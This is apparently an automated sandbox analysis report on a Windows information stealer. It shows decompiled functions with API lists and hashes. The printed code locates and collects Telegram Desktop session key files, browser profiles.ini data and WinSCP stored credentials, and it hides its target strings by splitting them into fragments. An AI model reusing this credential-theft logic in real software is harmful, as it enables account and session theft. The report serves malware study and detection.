				intOrPtr _t62;
				intOrPtr _t63;
				char* _t67;
				char* _t69;
				char* _t70;
				char* _t71;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr _t119;
				intOrPtr _t120;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				intOrPtr _t131;
				void* _t135;
				void* _t138;
				void* _t146;
				void* _t147;
				void* _t148;
				intOrPtr _t150;
				intOrPtr* _t152;
				signed int _t153;
				void* _t154;

				_t154 = __eflags;
				_t152 = __esi;
				_t146 = __edx;
				_t35 =  *0x443674; // 0x393162b1
				_v8 = _t35 ^ _t153;
				 *0x446250 = HeapAlloc(GetProcessHeap(), 0, 0x98967f);
				 *((intOrPtr*)(__esi + 0xc)) = 0;
				 *((intOrPtr*)(__esi + 0x10)) = 0;
				 *((intOrPtr*)(__esi + 8)) = 0;
				 *((intOrPtr*)(__esi + 0x18)) = 0;
				 *((intOrPtr*)(__esi + 0x14)) = 0;
				 *((intOrPtr*)(__esi + 0x1c)) = 0;
				E004132E6(0, __esi, _t154, _a4, _a8);
				_t150 =  *0x445ee8; // 0x4c98480
				_t109 = __esi;
				E00413159(__esi, _t146, _t150, _t154,  *0x4460a0);
				_t151 =  *0x445bb4; // 0x4c984a8
				E00413159(__esi, _t146, _t151, _t154,  *0x445e8c);
				_push( *0x445fe4);
				_push( *0x445d8c);
				_push(__esi);
				E00412D3C(__esi, _t146, _t151, __esi, _t154);
				_push( *0x445ae4);
				_push( *0x445db0);
				_push(_t152);
				E00412D3C(_t109, _t146, _t151, _t152, _t154);
				_push( *0x445e24);
				_t114 =  *0x445dc4; // 0x4c984e0
				_push(_t152);
				E00412B55(_t109, _t114, _t146, _t151, _t152, _t154);
				_push( *0x445c08);
				_t115 =  *0x446074; // 0x4c99988
				_push(_t152);
				E00412B55(_t109, _t115, _t146, _t151, _t152, _t154);
				_push( *0x445f34);
				_t116 =  *0x445bec; // 0x4c99ba8
				_push(_t152);
				E00412B55(_t109, _t116, _t146, _t151, _t152, _t154);
				_push( *0x445e28);
				_t117 =  *0x445e70; // 0x4c99ac8
				_push(_t152);
				E00412B55(_t109, _t117, _t146, _t151, _t152, _t154);
				_push( *0x445e4c);
				_t118 =  *0x4461c0; // 0x4c998e8
				_push(_t152);
				E00412B55(_t109, _t118, _t146, _t151, _t152, _t154);
				_push( *0x4460dc);
				_t119 =  *0x445a9c; // 0x4c98508
				_push(_t152);
				E00412B55(_t109, _t119, _t146, _t151, _t152, _t154);
				_push( *0x446020);
				_t120 =  *0x445df4; // 0x4c98530
				_push(_t152);
				E00412B55(_t109, _t120, _t146, _t151, _t152, _t154);
				_push( *0x445aa8);
				_t121 =  *0x445ff0; // 0x4c98560
				_push(_t152);
				E00412B55(_t109, _t121, _t146, _t151, _t152, _t154);
				_push( *0x445df0);
				_t122 =  *0x445c24; // 0x4c99750
				_push(_t152);
				E00412B55(_t109, _t122, _t146, _t151, _t152, _t154);
				_push( *0x445bac);
				_t123 =  *0x445c3c; // 0x4c99a88
				_push(_t152);
				E00412B55(_t109, _t123, _t146, _t151, _t152, _t154);
				_push( *0x445de4);
				_t124 =  *0x445e98; // 0x4c99ae8
				_push(_t152);
				E00412B55(_t109, _t124, _t146, _t151, _t152, _t154);
				_push( *0x446110);
				_push(_t152);
				_t125 =  *0x445abc; // 0x4c998a8
				E00412B55(_t109, _t125, _t146, _t151, _t152, _t154);
				_push( *0x445af8);
				_t126 =  *0x445b90; // 0x4c999c8
				_push(_t152);
				E00412B55(_t109, _t126, _t146, _t151, _t152, _t154);
				_push( *0x4461c4);
				_t127 =  *0x445f8c; // 0x4c99bc8
				_push(_t152);
				E00412B55(_t109, _t127, _t146, _t151, _t152, _t154);
				_push( *0x445b70);
				_t128 =  *0x445fa8; // 0x4c99bf0
				_push(_t152);
				E00412B55(_t109, _t128, _t146, _t151, _t152, _t154);
				_push( *0x4460b4);
				_t129 =  *0x445a7c; // 0x4c99c18
				_push(_t152);
				E00412B55(_t109, _t129, _t146, _t151, _t152, _t154);
				_push( *0x445b10);
				_t130 =  *0x446040; // 0x4c9c088
				_push(_t152);
				E00412B55(_t109, _t130, _t146, _t151, _t152, _t154);
				_push( *0x445cac);
				_t131 =  *0x445ad8; // 0x4c9b400
				_push(_t152);
				E00412B55(_t109, _t131, _t146, _t151, _t152, _t154);
				_t110 = 0;
				_t155 =  *_t152;
				if( *_t152 != 0) {
					_push(_t152);
					E00410CC2(0, _t151, _t152, _t155);
					_t156 =  *_t152;
					if( *_t152 != 0) {
						E00411867(0, _t151, _t152, _t156);
						E0041067C(0, _t151, _t152, _t156);
						_t151 =  *0x445e7c; // 0x4c9a3e8
						E00413159(_t152, _t146, _t151, _t156,  *0x445c38);
						_t110 = 0;
					}
				}
				if( *((intOrPtr*)(_t152 + 5)) == _t110) {
					L11:
					_t62 =  *0x446230; // 0x0
					 *((intOrPtr*)(_t152 + 0xc)) = _t62;
					_t63 =  *0x44623c; // 0x0
					 *((intOrPtr*)(_t152 + 0x10)) = _t63;
					E0041CEBE( *0x446058,  *0x446320( *0x446250));
					_t135 = 4;
					_t67 = 0x446250;
					do {
						 *_t67 = _t110;
						_t67 = _t67 + 1;
						_t135 = _t135 - 1;
					} while (_t135 != 0);
					return E0041DA9B(_t67, _t110, _v8 ^ _t153, _t146, _t151, _t152);
				} else {
					_t138 = 0x104;
					_t147 = 0x104;
					_t69 =  &_v276;
					do {
						 *_t69 = _t110;
						_t69 = _t69 + 1;
						_t147 = _t147 - 1;
					} while (_t147 != 0);
					_t148 = 0x104;
					_t70 =  &_v804;
					do {
						 *_t70 = _t110;
						_t70 = _t70 + 1;
						_t148 = _t148 - 1;
					} while (_t148 != 0);
					_t71 =  &_v540;
					do {
						 *_t71 = _t110;
						_t71 = _t71 + 1;
						_t138 = _t138 - 1;
					} while (_t138 != 0);
					lstrcatA( &_v276, E00416617(_t110, _t151, _t152, 0x1a));
					lstrcatA( &_v276, "\\Telegr");
					lstrcatA( &_v276, "am Desk");
					lstrcatA( &_v276, "top\\");
					lstrcatA( &_v804, "key_");
					lstrcatA( &_v804, "datas");
					lstrcatA( &_v540, "D877F783D5");
					lstrcatA( &_v540, "D3EF8C");
					lstrcatA( &_v540, "*");
					_t151 = 0x43c8d8;
					E00411117(_t152, _t148, 0x43c8d8,  &_v276,  &_v804);
					E00411117(_t152, _t148, 0x43c8d8,  &_v276,  &_v540);
					E00411117(_t152, _t148, 0x43c8d8,  &_v276, "map*");
					E00411117(_t152, _t148, 0x43c8d8,  &_v276, "A7FDF864FBC10B77*");
					E00411117(_t152, _t148, 0x43c8d8,  &_v276, "A92DAA6EA6F891F2*");
					E00411117(_t152, _t148, 0x43c8d8,  &_v276, "F8806DD0C461824F*");
					goto L11;
				}
			}












































                                                                    0x004133b9
                                                                    0x004133b9
                                                                    0x004133b9
                                                                    0x004133c2
                                                                    0x004133c9
                                                                    0x004133e6
                                                                    0x004133ee
                                                                    0x004133f1
                                                                    0x004133f4
                                                                    0x004133f7
                                                                    0x004133fa
                                                                    0x004133fd
                                                                    0x00413400
                                                                    0x00413405
                                                                    0x00413413
                                                                    0x00413415
                                                                    0x00413420
                                                                    0x00413426
                                                                    0x0041342b
                                                                    0x00413431
                                                                    0x00413437
                                                                    0x00413438
                                                                    0x0041343d
                                                                    0x00413443
                                                                    0x00413449
                                                                    0x0041344a
                                                                    0x0041344f
                                                                    0x00413455
                                                                    0x0041345b
                                                                    0x0041345c
                                                                    0x00413461
                                                                    0x00413467
                                                                    0x0041346d
                                                                    0x0041346e
                                                                    0x00413473
                                                                    0x00413479
                                                                    0x0041347f
                                                                    0x00413480
                                                                    0x00413485
                                                                    0x0041348b
                                                                    0x00413491
                                                                    0x00413492
                                                                    0x00413497
                                                                    0x0041349d
                                                                    0x004134a3
                                                                    0x004134a4
                                                                    0x004134a9
                                                                    0x004134af
                                                                    0x004134b5
                                                                    0x004134b6
                                                                    0x004134bb
                                                                    0x004134c1
                                                                    0x004134c7
                                                                    0x004134c8
                                                                    0x004134cd
                                                                    0x004134d3
                                                                    0x004134d9
                                                                    0x004134da
                                                                    0x004134df
                                                                    0x004134e5
                                                                    0x004134eb
                                                                    0x004134ec
                                                                    0x004134f1
                                                                    0x004134f7
                                                                    0x004134fd
                                                                    0x004134fe
                                                                    0x00413503
                                                                    0x00413509
                                                                    0x0041350f
                                                                    0x00413510
                                                                    0x00413515
                                                                    0x0041351b
                                                                    0x0041351c
                                                                    0x00413522
                                                                    0x00413527
                                                                    0x0041352d
                                                                    0x00413533
                                                                    0x00413534
                                                                    0x00413539
                                                                    0x0041353f
                                                                    0x00413545
                                                                    0x00413546
                                                                    0x0041354b
                                                                    0x00413551
                                                                    0x00413557
                                                                    0x00413558
                                                                    0x0041355d
                                                                    0x00413563
                                                                    0x00413569
                                                                    0x0041356a
                                                                    0x0041356f
                                                                    0x00413575
                                                                    0x0041357b
                                                                    0x0041357c
                                                                    0x00413581
                                                                    0x00413587
                                                                    0x0041358d
                                                                    0x0041358e
                                                                    0x00413593
                                                                    0x00413595
                                                                    0x00413597
                                                                    0x00413599
                                                                    0x0041359a
                                                                    0x0041359f
                                                                    0x004135a1
                                                                    0x004135a3
                                                                    0x004135a8
                                                                    0x004135b3
                                                                    0x004135bb
                                                                    0x004135c0
                                                                    0x004135c0
                                                                    0x004135a1
                                                                    0x004135c5
                                                                    0x0041371f
                                                                    0x0041371f
                                                                    0x00413724
                                                                    0x00413727
                                                                    0x0041372c
                                                                    0x0041374b
                                                                    0x00413754
                                                                    0x00413755
                                                                    0x0041375a
                                                                    0x0041375a
                                                                    0x0041375c
                                                                    0x0041375d
                                                                    0x0041375d
                                                                    0x0041376d
                                                                    0x004135cb
                                                                    0x004135cb
                                                                    0x004135d0
                                                                    0x004135d2
                                                                    0x004135d8
                                                                    0x004135d8
                                                                    0x004135da
                                                                    0x004135db
                                                                    0x004135db
                                                                    0x004135de
                                                                    0x004135e0
                                                                    0x004135e6
                                                                    0x004135e6
                                                                    0x004135e8
                                                                    0x004135e9
                                                                    0x004135e9
                                                                    0x004135ec
                                                                    0x004135f2
                                                                    0x004135f2
                                                                    0x004135f4
                                                                    0x004135f5
                                                                    0x004135f5
                                                                    0x00413608
                                                                    0x0041361a
                                                                    0x0041362c
                                                                    0x0041363e
                                                                    0x00413650
                                                                    0x00413662
                                                                    0x00413674
                                                                    0x00413686
                                                                    0x00413698
                                                                    0x004136ac
                                                                    0x004136b4
                                                                    0x004136ca
                                                                    0x004136de
                                                                    0x004136f2
                                                                    0x00413706
                                                                    0x0041371a
                                                                    0x00000000
                                                                    0x0041371a

                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(00000000,0098967F,0043C8D8,00000000), ref: 004133D6
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 004133DD
                                                                      • Part of subcall function 00413159: _memset.LIBCMT ref: 00413185
                                                                      • Part of subcall function 00413159: _memset.LIBCMT ref: 00413197
                                                                      • Part of subcall function 00413159: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 004131AF
                                                                      • Part of subcall function 00413159: lstrcatA.KERNEL32(?,04C98480,?,?,?,?,?,?), ref: 004131BD
                                                                      • Part of subcall function 00413159: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 004131D1
                                                                      • Part of subcall function 00413159: lstrcatA.KERNEL32(?,..\,?,?,?,?,?,?), ref: 004131E3
                                                                      • Part of subcall function 00413159: lstrcatA.KERNEL32(?,0043F250,?,?,?,?,?,?), ref: 004131F5
                                                                      • Part of subcall function 00413159: lstrcatA.KERNEL32(?,0043F254,?,?,?,?,?,?), ref: 00413207
                                                                      • Part of subcall function 00413159: lstrcatA.KERNEL32(?,0043F258,?,?,?,?,?,?), ref: 00413219
                                                                      • Part of subcall function 00413159: lstrcatA.KERNEL32(?,0043F25C,?,?,?,?,?,?), ref: 0041322B
                                                                      • Part of subcall function 00413159: lstrcatA.KERNEL32(?,0043F260,?,?,?,?,?,?), ref: 0041323D
                                                                      • Part of subcall function 00413159: lstrcatA.KERNEL32(?,0043EE58,?,?,?,?,?,?), ref: 0041324F
                                                                      • Part of subcall function 00413159: lstrcatA.KERNEL32(?,0043EE5C,?,?,?,?,?,?), ref: 00413261
                                                                      • Part of subcall function 00413159: lstrcatA.KERNEL32(?,0043EE64,?,?,?,?,?,?), ref: 00413273
                                                                      • Part of subcall function 00413159: lstrcatA.KERNEL32(?,.ini,?,?,?,?,?,?), ref: 00413285
                                                                      • Part of subcall function 00413159: GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?), ref: 00413292
                                                                      • Part of subcall function 00413159: FreeLibrary.KERNEL32(?,?,?,?,?,?), ref: 004132D1
                                                                      • Part of subcall function 00412D3C: __EH_prolog3_GS.LIBCMT ref: 00412D46
                                                                      • Part of subcall function 00412D3C: _memset.LIBCMT ref: 00412D88
                                                                      • Part of subcall function 00412D3C: _memset.LIBCMT ref: 00412D99
                                                                      • Part of subcall function 00412D3C: lstrcatA.KERNEL32(?,00000000,?,?,?,00000370,0041343D,?), ref: 00412DB1
                                                                      • Part of subcall function 00412D3C: lstrcatA.KERNEL32(?,04C9A4C8,?,?,?,00000370,0041343D,?), ref: 00412DBF
                                                                      • Part of subcall function 00412D3C: lstrcatA.KERNEL32(?,?,?,?,?,00000370,0041343D,?), ref: 00412DD2
                                                                      • Part of subcall function 00412D3C: StrCmpCA.SHLWAPI(?,?,?,?,00000370,0041343D,?), ref: 00412DEA
                                                                      • Part of subcall function 00412D3C: StrCmpCA.SHLWAPI(?,?,?,?,00000370,0041343D,?), ref: 00412E0A
                                                                      • Part of subcall function 00412D3C: lstrcatA.KERNEL32(=4A,00000000,?,?,?,00000370,0041343D,?), ref: 00412E2E
                                                                      • Part of subcall function 00412D3C: lstrcatA.KERNEL32(=4A,04C9A4C8,?,?,?,00000370,0041343D,?), ref: 00412E3C
                                                                      • Part of subcall function 00412D3C: _memset.LIBCMT ref: 00412E4B
                                                                      • Part of subcall function 00412D3C: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,00000370,0041343D,?), ref: 00412E61
                                                                      • Part of subcall function 00412D3C: lstrcatA.KERNEL32(?,0043C8E0,?,?,?,?,?,?,00000370,0041343D,?), ref: 00412E73
                                                                      • Part of subcall function 00412D3C: lstrcatA.KERNEL32(?,?,?,?,?,?,?,00000370,0041343D,?), ref: 00412E86
                                                                      • Part of subcall function 00412D3C: GetFileAttributesW.KERNEL32(00000000,?,?,?), ref: 00412EE5
                                                                      • Part of subcall function 00412B55: __EH_prolog3_GS.LIBCMT ref: 00412B5F
                                                                      • Part of subcall function 00412B55: _memset.LIBCMT ref: 00412B94
                                                                      • Part of subcall function 00412B55: lstrcatA.KERNEL32(?,00000000,?,?,?), ref: 00412BAC
                                                                      • Part of subcall function 00412B55: lstrcatA.KERNEL32(?), ref: 00412BBA
                                                                      • Part of subcall function 00412B55: _memset.LIBCMT ref: 00412BC9
                                                                      • Part of subcall function 00412B55: lstrcatA.KERNEL32(?,?), ref: 00412BDF
                                                                      • Part of subcall function 00412B55: lstrcatA.KERNEL32(?,0043C8E0), ref: 00412BF1
                                                                      • Part of subcall function 00412B55: lstrcatA.KERNEL32(?), ref: 00412C04
                                                                      • Part of subcall function 00412B55: GetFileAttributesW.KERNEL32(00000000,?,?,?), ref: 00412C63
                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00413608
                                                                    • lstrcatA.KERNEL32(?,\Telegr), ref: 0041361A
                                                                    • lstrcatA.KERNEL32(?,am Desk), ref: 0041362C
                                                                    • lstrcatA.KERNEL32(?,top\), ref: 0041363E
                                                                    • lstrcatA.KERNEL32(?,key_), ref: 00413650
                                                                    • lstrcatA.KERNEL32(?,datas), ref: 00413662
                                                                    • lstrcatA.KERNEL32(?,D877F783D5), ref: 00413674
                                                                    • lstrcatA.KERNEL32(?,D3EF8C), ref: 00413686
                                                                    • lstrcatA.KERNEL32(?,0043EE4C), ref: 00413698
                                                                      • Part of subcall function 00410CC2: __EH_prolog3_GS.LIBCMT ref: 00410CCC
                                                                      • Part of subcall function 00410CC2: lstrcatA.KERNEL32(?,00000000,00000000,00000970,0041359F,?,?,?,?,?,?,?,?,?,?,?), ref: 00410D37
                                                                      • Part of subcall function 00410CC2: lstrcatA.KERNEL32(?), ref: 00410D4A
                                                                      • Part of subcall function 00410CC2: lstrcatA.KERNEL32(?), ref: 00410D5D
                                                                      • Part of subcall function 00410CC2: lstrcatA.KERNEL32(?,00000000), ref: 00410D73
                                                                      • Part of subcall function 00410CC2: lstrcatA.KERNEL32(?), ref: 00410D86
                                                                      • Part of subcall function 00410CC2: lstrcatA.KERNEL32(?,0043EE4C), ref: 00410D98
                                                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00413735
                                                                      • Part of subcall function 00411867: __EH_prolog3_GS.LIBCMT ref: 00411871
                                                                      • Part of subcall function 00411867: _memset.LIBCMT ref: 00411891
                                                                      • Part of subcall function 00411867: _memset.LIBCMT ref: 004118B7
                                                                      • Part of subcall function 00411867: _memset.LIBCMT ref: 004118CE
                                                                      • Part of subcall function 00411867: _memset.LIBCMT ref: 004118E5
                                                                      • Part of subcall function 00411867: RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,00000000,000003FF,?,?), ref: 00411940
                                                                      • Part of subcall function 0041067C: __EH_prolog3_GS.LIBCMT ref: 00410686
                                                                      • Part of subcall function 0041067C: lstrcatA.KERNEL32(?,00000000,000002B4,004135AD,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004106AD
                                                                      • Part of subcall function 0041067C: lstrcatA.KERNEL32(?), ref: 004106C0
                                                                      • Part of subcall function 0041067C: GetFileAttributesA.KERNEL32(?), ref: 004106CD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$_memset$H_prolog3_$AttributesFile$Heap$AllocFreeLibraryOpenProcesslstrlen
                                                                    • String ID: A7FDF864FBC10B77*$A92DAA6EA6F891F2*$D3EF8C$D877F783D5$F8806DD0C461824F*$\Telegr$am Desk$datas$key_$map*$top\
                                                                    • API String ID: 1858104327-3388137842
                                                                    • Opcode ID: 659d0d3468b882db7146e9531d40e2a62fbc2b1c1323ae8c440993606b56960e
                                                                    • Instruction ID: be27dc903460e2f85ebb8b929572482b6915c86958491e030e2f695d73b02eb9
                                                                    • Opcode Fuzzy Hash: 659d0d3468b882db7146e9531d40e2a62fbc2b1c1323ae8c440993606b56960e
                                                                    • Instruction Fuzzy Hash: 56918279500904AFCB16EF61EC45DEAB76DBB4F301B00406AF60193262DB796A85CB6D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00413159 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 104stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 97%
                                                                    			E00413159(void* __ebx, void* __edx, CHAR* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v276;
				char _v540;
				intOrPtr _v544;
				void* __esi;
				void* __ebp;
				signed int _t27;
				int _t63;
				void* _t65;
				void* _t74;
				signed int _t77;

				_t75 = __edi;
				_t74 = __edx;
				_t69 = __ebx;
				_t27 =  *0x443674; // 0x393162b1
				_v8 = _t27 ^ _t77;
				_v544 = _a4;
				E00426300( &_v540, 0, 0x104);
				E00426300( &_v276, 0, 0x104);
				lstrcatA( &_v540, E00416617(__ebx, __edi, 0x104, 0x1a));
				lstrcatA( &_v540, __edi);
				lstrcatA( &_v276,  &_v540);
				lstrcatA( &_v276, "..\\");
				lstrcatA( &_v276, "p");
				lstrcatA( &_v276, "r");
				lstrcatA( &_v276, "o");
				lstrcatA( &_v276, "f");
				lstrcatA( &_v276, "i");
				lstrcatA( &_v276, "l");
				lstrcatA( &_v276, "e");
				lstrcatA( &_v276, "s");
				lstrcatA( &_v276, ".ini");
				_t63 = GetFileAttributesA( &_v276);
				if(_t63 != 0xffffffff && (_t63 & 0x00000010) == 0) {
					_t65 = E00412FC2(__ebx, _t74, __edi, 0x104);
					_t84 = _t65;
					if(_t65 != 0) {
						E0040B63D(__ebx, _t74, __edi, 0x104, _t84);
						E0041048F(__ebx, 0x43c8d8,  &_v540, _v544,  *((intOrPtr*)(__ebx + 0x20)));
					}
					_t63 = FreeLibrary( *0x446240);
				}
				return E0041DA9B(_t63, _t69, _v8 ^ _t77, _t74, _t75, 0x104);
			}














                                                                    0x00413159
                                                                    0x00413159
                                                                    0x00413159
                                                                    0x00413162
                                                                    0x00413169
                                                                    0x00413176
                                                                    0x00413185
                                                                    0x00413197
                                                                    0x004131af
                                                                    0x004131bd
                                                                    0x004131d1
                                                                    0x004131e3
                                                                    0x004131f5
                                                                    0x00413207
                                                                    0x00413219
                                                                    0x0041322b
                                                                    0x0041323d
                                                                    0x0041324f
                                                                    0x00413261
                                                                    0x00413273
                                                                    0x00413285
                                                                    0x00413292
                                                                    0x0041329b
                                                                    0x004132a1
                                                                    0x004132a6
                                                                    0x004132a8
                                                                    0x004132aa
                                                                    0x004132c6
                                                                    0x004132c6
                                                                    0x004132d1
                                                                    0x004132d1
                                                                    0x004132e3

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00413185
                                                                    • _memset.LIBCMT ref: 00413197
                                                                      • Part of subcall function 00416617: _memset.LIBCMT ref: 00416638
                                                                      • Part of subcall function 00416617: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00416650
                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 004131AF
                                                                    • lstrcatA.KERNEL32(?,04C98480,?,?,?,?,?,?), ref: 004131BD
                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 004131D1
                                                                    • lstrcatA.KERNEL32(?,..\,?,?,?,?,?,?), ref: 004131E3
                                                                    • lstrcatA.KERNEL32(?,0043F250,?,?,?,?,?,?), ref: 004131F5
                                                                    • lstrcatA.KERNEL32(?,0043F254,?,?,?,?,?,?), ref: 00413207
                                                                    • lstrcatA.KERNEL32(?,0043F258,?,?,?,?,?,?), ref: 00413219
                                                                    • lstrcatA.KERNEL32(?,0043F25C,?,?,?,?,?,?), ref: 0041322B
                                                                    • lstrcatA.KERNEL32(?,0043F260,?,?,?,?,?,?), ref: 0041323D
                                                                    • lstrcatA.KERNEL32(?,0043EE58,?,?,?,?,?,?), ref: 0041324F
                                                                    • lstrcatA.KERNEL32(?,0043EE5C,?,?,?,?,?,?), ref: 00413261
                                                                    • lstrcatA.KERNEL32(?,0043EE64,?,?,?,?,?,?), ref: 00413273
                                                                    • lstrcatA.KERNEL32(?,.ini,?,?,?,?,?,?), ref: 00413285
                                                                    • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?), ref: 00413292
                                                                      • Part of subcall function 00412FC2: GetEnvironmentVariableA.KERNEL32(PATH,00446F38,0000FFFF,04C98480,00000104,?,?,004132A6,?,?,?,?,?,?), ref: 00413000
                                                                      • Part of subcall function 00412FC2: _memset.LIBCMT ref: 00413015
                                                                      • Part of subcall function 00412FC2: lstrcatA.KERNEL32(?,00446F38,?,?,?,?,?,?,?,?,?), ref: 00413025
                                                                      • Part of subcall function 00412FC2: lstrcatA.KERNEL32(?,0043EAA0,?,?,?,?,?,?,?,?,?), ref: 00413037
                                                                      • Part of subcall function 00412FC2: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0041304A
                                                                      • Part of subcall function 00412FC2: SetEnvironmentVariableA.KERNEL32(PATH,?,?,?,?,?,?,?,?,?,?), ref: 00413058
                                                                      • Part of subcall function 00412FC2: _memset.LIBCMT ref: 00413069
                                                                      • Part of subcall function 00412FC2: LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00413077
                                                                      • Part of subcall function 00412FC2: GetProcAddress.KERNEL32(00000000), ref: 00413091
                                                                      • Part of subcall function 00412FC2: GetProcAddress.KERNEL32 ref: 004130A8
                                                                      • Part of subcall function 00412FC2: GetProcAddress.KERNEL32 ref: 004130BF
                                                                      • Part of subcall function 00412FC2: GetProcAddress.KERNEL32 ref: 004130D6
                                                                      • Part of subcall function 00412FC2: GetProcAddress.KERNEL32 ref: 004130ED
                                                                      • Part of subcall function 00412FC2: GetProcAddress.KERNEL32 ref: 00413104
                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?), ref: 004132D1
                                                                      • Part of subcall function 0040B63D: __EH_prolog3_GS.LIBCMT ref: 0040B644
                                                                      • Part of subcall function 0041048F: wsprintfA.USER32 ref: 004104D2
                                                                      • Part of subcall function 0041048F: FindFirstFileA.KERNEL32(?,?), ref: 004104E9
                                                                      • Part of subcall function 0041048F: StrCmpCA.SHLWAPI(?,0043EAC4), ref: 0041050A
                                                                      • Part of subcall function 0041048F: StrCmpCA.SHLWAPI(?,0043EAC8), ref: 00410524
                                                                      • Part of subcall function 0041048F: wsprintfA.USER32 ref: 0041054B
                                                                      • Part of subcall function 0041048F: StrCmpCA.SHLWAPI(?), ref: 00410561
                                                                      • Part of subcall function 0041048F: FindNextFileA.KERNEL32(?,?), ref: 00410651
                                                                      • Part of subcall function 0041048F: FindClose.KERNEL32(?), ref: 00410665
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$AddressProc$_memset$FileFind$EnvironmentLibraryVariablewsprintf$AttributesCloseFirstFolderFreeH_prolog3_LoadNextPath
                                                                    • String ID: ..\$.ini
                                                                    • API String ID: 2707205512-2443844595
                                                                    • Opcode ID: 3ab689e3c8d638d492200030f847672be8299ec36c4ffc3334e690cf4a5188cb
                                                                    • Instruction ID: 1f7035c71499a097c8672d82dd9660f64b80c44ebe973ff61bc42328851bffe5
                                                                    • Opcode Fuzzy Hash: 3ab689e3c8d638d492200030f847672be8299ec36c4ffc3334e690cf4a5188cb
                                                                    • Instruction Fuzzy Hash: F241F076D4021CABCF11DBA0DC4AEDEB77CAB0E711F5104A6B615D3090D6B896C88F69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040E9B8 Relevance: 31.7, APIs: 21, Instructions: 163stringfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 47%
                                                                    			E0040E9B8(void* __ebx, CHAR* __ecx, CHAR* __edi, void* __esi, void* __eflags) {
				void* _t46;
				void* _t54;
				void* _t59;
				void* _t62;
				CHAR* _t63;
				CHAR* _t64;
				void* _t66;
				char _t68;
				CHAR* _t81;
				char _t88;
				CHAR* _t107;
				CHAR* _t108;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t113;

				_t113 = __eflags;
				_t105 = __edi;
				_t87 = __ebx;
				E0042083E(E00433CD7, __ebx, __edi, __esi);
				 *(_t109 - 0x144) =  *(_t109 + 8);
				 *((intOrPtr*)(_t109 - 0x148)) =  *((intOrPtr*)(_t109 + 0x10));
				_t107 = __ecx;
				E00426300(_t109 - 0x118, 0, 0x104);
				_t111 = _t110 + 0xc;
				lstrcatA(_t109 - 0x118,  *0x445fe0);
				_t46 = 0x1a;
				lstrcatA(_t109 - 0x118, E00415EF6(_t46, _t113));
				CopyFileA(_t107, _t109 - 0x118, 1);
				_t108 =  *0x445e0c; // 0x4c904b8
				_t54 =  *0x446248(_t109 - 0x118, _t109 - 0x13c, 0x140);
				if(_t54 == 0) {
					_t59 =  *0x4461fc( *((intOrPtr*)(_t109 - 0x13c)), _t108, 0xffffffff, _t109 - 0x138, _t54);
					_t112 = _t111 + 0x14;
					if(_t59 == 0) {
						_t62 =  *0x446218( *((intOrPtr*)(_t109 - 0x138)));
						_t116 = _t62 - 0x64;
						if(_t62 == 0x64) {
							_t108 = 0x43c8dc;
							do {
								_t63 =  *0x446238( *((intOrPtr*)(_t109 - 0x138)), 0);
								 *(_t109 - 0x140) = _t63;
								_t64 =  *0x446238( *((intOrPtr*)(_t109 - 0x138)), 1);
								_t112 = _t112 + 0x10;
								_t105 = _t64;
								_t66 =  *0x44622c( *((intOrPtr*)(_t109 - 0x138)), 2,  *0x446224( *((intOrPtr*)(_t109 - 0x138)), 2,  *((intOrPtr*)(_t109 + 0xc))));
								_t88 = _t109 - 0x134;
								E0040E874(_t88,  *((intOrPtr*)(_t109 - 0x148)), _t66, _t105, _t108, _t116);
								 *(_t109 - 4) =  *(_t109 - 4) & 0x00000000;
								_t68 =  *(_t109 - 0x134);
								if( *((intOrPtr*)(_t109 - 0x120)) < 0x10) {
									_t68 = _t88;
								}
								_t87 = 0x43c8d8;
								_push(0x43c8d8);
								_push(_t68);
								if( *0x446458() != 0) {
									L8:
									lstrcatA( *0x446250, _t108);
									lstrcatA( *0x446250,  *0x445e44);
									lstrcatA( *0x446250,  *(_t109 - 0x144));
									lstrcatA( *0x446250, _t108);
